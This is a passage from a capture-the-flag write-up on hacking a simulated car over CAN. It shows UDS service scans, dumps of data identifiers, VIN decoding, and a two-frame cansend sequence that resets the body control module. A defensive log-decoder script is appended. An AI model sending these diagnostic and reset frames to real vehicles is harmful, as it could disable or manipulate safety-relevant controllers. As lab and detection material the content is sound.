Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER
Supported service 0x3e: TESTER_PRESENT
Supported service 0xba: Unknown service

$ python3 cc.py -i vcan0 uds services 0x62c 0x52c
Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL
Supported service 0x11: ECU_RESET
Supported service 0x22: READ_DATA_BY_IDENTIFIER
Supported service 0x23: READ_MEMORY_BY_ADDRESS
Supported service 0x27: SECURITY_ACCESS
Supported service 0x28: COMMUNICATION_CONTROL
Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER
Supported service 0x3e: TESTER_PRESENT
Supported service 0xba: Unknown service

$ python3 cc.py -i vcan0 uds services 0x7e0 0x7e8
Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL
Supported service 0x11: ECU_RESET
Supported service 0x22: READ_DATA_BY_IDENTIFIER
Supported service 0x23: READ_MEMORY_BY_ADDRESS
Supported service 0x27: SECURITY_ACCESS
Supported service 0x28: COMMUNICATION_CONTROL
Supported service 0x2e: WRITE_DATA_BY_IDENTIFIER
Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER
Supported service 0x3e: TESTER_PRESENT
Supported service 0xba: Unknown service

$ python3 cc.py -i vcan0 uds services
```
0x7e2 0x7e9 305 | Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL 306 | Supported service 0x11: ECU_RESET 307 | Supported service 0x22: READ_DATA_BY_IDENTIFIER 308 | Supported service 0x23: READ_MEMORY_BY_ADDRESS 309 | Supported service 0x27: SECURITY_ACCESS 310 | Supported service 0x28: COMMUNICATION_CONTROL 311 | Supported service 0x2f: INPUT_OUTPUT_CONTROL_BY_IDENTIFIER 312 | Supported service 0x3e: TESTER_PRESENT 313 | Supported service 0xba: Unknown service 314 | 315 | $ python3 cc.py -i vcan0 uds services 0x7f1 0x7f9 316 | Supported service 0x10: DIAGNOSTIC_SESSION_CONTROL 317 | Supported service 0x11: ECU_RESET 318 | Supported service 0x22: READ_DATA_BY_IDENTIFIER 319 | Supported service 0x27: SECURITY_ACCESS 320 | Supported service 0x2e: WRITE_DATA_BY_IDENTIFIER 321 | Supported service 0x3e: TESTER_PRESENT 322 | 323 | # dump Data Identifiers for each ECU 324 | $ python3 cc.py -i vcan0 uds dump_dids 0x620 0x520 -t0.1 325 | Identified DIDs: 326 | DID Value (hex) 327 | 0x020d 62020d00 328 | 0x020e 62020e90 329 | 0x02a0 6202a000 330 | 0x02a1 6202a100 331 | 0x02a2 6202a200 332 | 0x1436 62143600 333 | 0x1703 62170300 334 | 0x1704 62170400 335 | 0x2224 62222400 336 | 0x2225 62222500 337 | 0x3334 62333400 338 | 0x4200 62420000000000 339 | 340 | $ python3 cc.py -i vcan0 uds dump_dids 0x622 0x522 -t0.1 341 | Identified DIDs: 342 | DID Value (hex) 343 | 0x010c 62010c0d70 344 | 0x010f 62010f00 345 | 0x0210 6202101f 346 | 0x0214 62021441 347 | 0x0300 62030001 348 | 0x030c 62030c01 349 | 0x0320 62032000 350 | 0x0345 62032100 351 | 0xfe00 62fe00010c0000 352 | 0xfe10 62fe10010c0000 353 | 354 | $ python3 cc.py -i vcan0 uds dump_dids 0x7e0 0x7e8 -t0.1 355 | Identified DIDs: 356 | DID Value (hex) 357 | 0x000c 62000c0d70 358 | 0x000d 62000d00 359 | 0x1000 62100001 360 | 0x2122 622122013143414e4255534841434b49534330304c 361 | 0x4200 624200010c0000 362 | 363 | $ python3 cc.py -i vcan0 uds dump_dids 0x7e2 0x7e9 -t0.1 364 | Identified DIDs: 365 | DID Value (hex) 366 | 0x010c 
62010c0d70 367 | 0x010f 62010f00 368 | 0x030c 62030c01 369 | 0x0911 62091182 370 | 371 | $ python3 cc.py -i vcan0 uds dump_dids 0x7f1 0x7f9 -t0.1 372 | Identified DIDs: 373 | DID Value (hex) 374 | 0x1111 62111100 375 | 0xf1a0 62f1900131464c414756494e535253343230363930 376 | 0xfa01 62fa0100 377 | 0xfa02 62fa0201 378 | 0xfa03 62fa0001 379 | 0xfa06 62fa06010101 380 | 381 | # decoding values discovered from dump_dids: 382 | ❯ echo "3143414e4255534841434b49534330304c" | xxd -r -p 383 | 1CANBUSHACKISC00L # <-- new (whole) VIN 384 | 385 | ❯ echo "31464c414756494e535253343230363930" | xxd -r -p 386 | 1FLAGVINSRS420690 # <-- ABS VIN 387 | ``` 388 | 389 | Unfortunately, I didn't find any of the 3 flags, and don't know where to go from here. 390 | 391 | 392 | ## Whole VIN - 150 393 | 394 | With [Cloud Car](https://cloudcar.canbushack.com) 395 | 396 | What's the **VIN**? You have to read from the ECM! 397 | 398 | ```bash 399 | # trying with OBD2 (also tried on all ArbIDs 7e0-7e7) 400 | $ echo "09 02" | isotpsend -s 7df -d 7e8 -p 00 vcan0 401 | # failed 402 | 403 | # trying with UDS "get VIN" (also tried on al ArbIDs 7e0-7e7) 404 | $ echo "22 f1 90" | isotpsend -s 7e0 -d 7e8 -p 00 vcan0 405 | # failed 406 | ``` 407 | 408 | `getvin.sh`: 409 | ```bash 410 | #!/bin/bash 411 | 412 | iface="${1:-vcan0}" 413 | src="${2:-7e0}" 414 | dst="${3:-7e8}" 415 | 416 | # exit on error 417 | set -e 418 | 419 | # sniff and capture responses 420 | VINFILE="$(mktemp -u /tmp/vin-isotp-XXX)" 421 | isotprecv -s "$src" -d "$dst" -p 00 "$iface" > "$VINFILE" & 422 | recv_pid=$! 423 | 424 | # send the "get VIN" request 425 | echo -n '09 02' | isotpsend -s "$src" -d "$dst" -p 00 "$iface" 426 | sleep 0.1 427 | 428 | # parse out VIN 429 | cat "$VINFILE" 430 | tail -c +10 "$VINFILE" | xxd -p -r 431 | echo 432 | 433 | rm "$VINFILE" 434 | kill $recv_pid &>/dev/null || true 435 | ``` 436 | 437 | All those attempts failed. 
By chance, when I was [scanning](#You%20Scanning%201st%202nd%20Last%20-%20100), the `dump_dids` command showed me the other VIN: 438 | 439 | ```bash 440 | $ python3 cc.py -i vcan0 uds dump_dids 0x7e0 0x7e8 -t0.1 441 | Identified DIDs: 442 | DID Value (hex) 443 | 0x000c 62000c0d70 444 | 0x000d 62000d00 445 | 0x1000 62100001 446 | 0x2122 622122013143414e4255534841434b49534330304c 447 | 0x4200 624200010c0000 448 | 449 | $ echo "3143414e4255534841434b49534330304c" | xxd -r -p 450 | 1CANBUSHACKISC00L 451 | ``` 452 | 453 | 454 | ## Reset Body Cntl - 175 455 | 456 | With [Cloud Car](https://cloudcar.canbushack.com) 457 | 458 | Using CAN Messaging, open the **Reset the BCM**. 459 | 460 | I tried using `caringcaribou` to reset the ECU's but I think I needed to establish a diagnostic session first? My attempts failed. 461 | 462 | ```bash 463 | $ python3 cc.py -i vcan0 uds ecu_reset 0x7e0 0x7e8 464 | # tried sending to all identified ECU pairs: 465 | # 0x620 -> 0x520 466 | # 0x622 -> 0x522 467 | # 0x62c -> 0x52c 468 | # 0x7e0 -> 0x7e8 469 | # 0x7e2 -> 0x7e9 470 | # 0x7f1 -> 0x7f9 471 | ``` 472 | 473 | `@fearfulspoon` on Discord sent me his solution: 474 | 475 | ```bash 476 | # Start Diagnostic Control Session with the BCM 477 | cansend vcan0 '620#0210020000000000' 478 | 479 | # Send Reset ECU (0x03 = softReset) 480 | cansend vcan0 '620#0211030000000000' 481 | 482 | # also attempted 0x01 (hardReset) and 0x02 (keyOffOnReset) 483 | # first, but received errors. 484 | ``` 485 | 486 | So I was definitely missing the "start diagnostic session" piece. Knowing which ArbID corresponded to the BCM was partly just guesswork, but it is the same one that was used for actuating the doors, which makes sense (that's a typical BCM function). 487 | 488 | ## Rollback - 200 489 | 490 | With [Cloud Car](https://cloudcar.canbushack.com) 491 | 492 | Using CAN Messaging, open the **Roll Odometer back to ZERO**. 
493 | 494 | ```bash 495 | # DID NOT ATTEMPT 496 | ``` 497 | 498 | 499 | ## Sec Escalate - 500 500 | 501 | With [Cloud Car](https://cloudcar.canbushack.com) 502 | 503 | Using CAN Messaging, open the **Update your Security Level on Controller**. 504 | 505 | ```bash 506 | # DID NOT ATTEMPT 507 | ``` 508 | 509 | 510 | ## Puff Air Bag YES - 650 511 | 512 | With [Cloud Car](https://cloudcar.canbushack.com) 513 | 514 | Using CAN Messaging, open the **Activate the Airbag**. 515 | 516 | If you do this, you are the like insane! Nice work. 517 | 518 | If you're the first to do this, We have a special Prize for you! (find @carfucar). 519 | 520 | ```bash 521 | # DID NOT ATTEMPT 522 | ``` 523 | 524 | --------------------------------------------------------------------------------
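As an added example (not code from this writeup, from `caringcaribou`, or from Cloud Car), here is a defender-side Python decoder for the UDS single-frame traffic this page deals with: it parses `candump -l` style log lines, flags the session-control, ECU-reset and IOCBI requests that the door and BCM-reset solutions above rely on, and splits `dump_dids` 0x62 responses into DID and record so the VIN bytes decode directly instead of via `tail`/`xxd`. The arbitration IDs and frame bytes are the ones shown on this page; the log timestamps and the sample negative response are constructed.

```python
import re

# Constructed candump -l style lines: one ordinary frame from the cansniffer
# snapshot plus the three BCM (0x620) frames used in this writeup.
SAMPLE_LOG = ["(1660000000.000000) vcan0 064#271000B6105A",
              "(1660000000.010000) vcan0 620#072F2224FFFFFFFF",  # IOCBI door
              "(1660000000.020000) vcan0 620#0210020000000000",  # session ctl
              "(1660000000.030000) vcan0 620#0211030000000000"]  # ECU reset
# Requests that change ECU state; a bus monitor should alert on these
# whenever they come from anything other than the legitimate tester.
STATE_CHANGING = {0x10: "DiagnosticSessionControl", 0x11: "ECUReset",
                  0x2F: "InputOutputControlByIdentifier"}
LOG_RE = re.compile(r"^\(([\d.]+)\)\s+\S+\s+([0-9A-Fa-f]{3,8})#([0-9A-Fa-f]*)$")

def parse_log_line(line):
    """Return (timestamp, arbitration ID, payload bytes) or None."""
    m = LOG_RE.match(line.strip())
    return (float(m[1]), int(m[2], 16), bytes.fromhex(m[3])) if m else None

def single_frame_pdu(payload):
    """ISO-TP single frame: PCI high nibble 0, low nibble = UDS PDU length."""
    n = payload[0] & 0x0F if payload and payload[0] >> 4 == 0 else 0
    return payload[1:1 + n] if 0 < n <= len(payload) - 1 else None

def decode_uds(pdu):
    sid = pdu[0]
    if sid == 0x7F and len(pdu) >= 3:   # negative response: 7F <SID> <NRC>
        return {"kind": "negative", "service": pdu[1], "nrc": pdu[2]}
    if 0x40 <= sid <= 0x7E:             # positive response = request SID + 0x40
        return {"kind": "positive", "service": sid - 0x40, "data": pdu[1:]}
    return {"kind": "request", "service": sid, "data": pdu[1:]}

def read_did_response(hexstr):
    """Split a 0x62 (ReadDataByIdentifier) response into (DID, record bytes)."""
    raw = bytes.fromhex(hexstr)
    if raw[0] != 0x62:
        raise ValueError("not a ReadDataByIdentifier positive response")
    return int.from_bytes(raw[1:3], "big"), raw[3:]

def flag_state_changes(log_lines):
    """Return (arb ID, service name, request data hex) for risky requests."""
    alerts = []
    for line in log_lines:
        parsed = parse_log_line(line)
        pdu = single_frame_pdu(parsed[2]) if parsed else None
        if pdu is None:
            continue
        info = decode_uds(pdu)
        if info["kind"] == "request" and info["service"] in STATE_CHANGING:
            alerts.append((parsed[1], STATE_CHANGING[info["service"]],
                           info["data"].hex()))
    return alerts
```

Running `flag_state_changes(SAMPLE_LOG)` yields three alerts for ID 0x620 and none for the normal-traffic frame, and `read_did_response` on the two VIN records from `dump_dids` gives the DID plus a one-byte prefix followed by the ASCII VIN.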